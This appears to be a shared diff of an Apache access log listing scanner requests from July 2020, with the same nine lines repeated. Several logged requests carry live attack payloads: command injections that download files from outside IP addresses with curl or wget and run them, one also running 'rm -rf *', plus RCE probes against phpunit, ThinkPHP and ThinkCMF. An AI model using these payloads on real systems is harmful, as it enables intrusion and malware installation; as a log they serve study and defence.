coffebar · July 21, 2020 07:56 · ArcadaLabs-Jason · Jul 30, 2020
diff --git a/apache.log b/apache.log
 122.155.10.51 - - [19/Jul/2020:13:22:44 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 484 "-" "-"
 102.44.142.173 - - [20/Jul/2020:21:55:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.0" 404 481 "-" "Hello, world"
 195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "POST /api/jsonws/invoke HTTP/1.0" 404 473 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 475 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.0" 200 865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 200 865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
	122.155.10.51 - - [19/Jul/2020:13:22:44 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 484 "-" "-"
	102.44.142.173 - - [20/Jul/2020:21:55:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.0" 404 481 "-" "Hello, world"
	195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "POST /api/jsonws/invoke HTTP/1.0" 404 473 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
	195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
	195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
	195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 475 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
	195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
	195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.0" 200 865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
	195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 200 865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"